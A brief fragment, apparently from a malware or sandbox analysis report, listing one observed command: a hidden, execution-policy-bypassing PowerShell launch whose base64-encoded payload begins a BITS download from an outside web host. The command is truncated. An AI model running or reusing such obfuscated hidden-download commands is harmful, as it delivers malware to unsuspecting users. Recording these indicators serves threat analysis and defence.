Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -Noninteractive -windowstyle hidden -encodedCommand UwB0AGEAcgB0AC0AQgBpAHQAcwBUAHIAYQBuAHMAZgBlAHIAIAAtAFMAbwB1AHIAYwBlACAAaAB0AHQAcABzADoALwAvAHAAcgBuAHQAYwBzAC4AYwBvAG0ALwB1AHAA...' (with hidden window)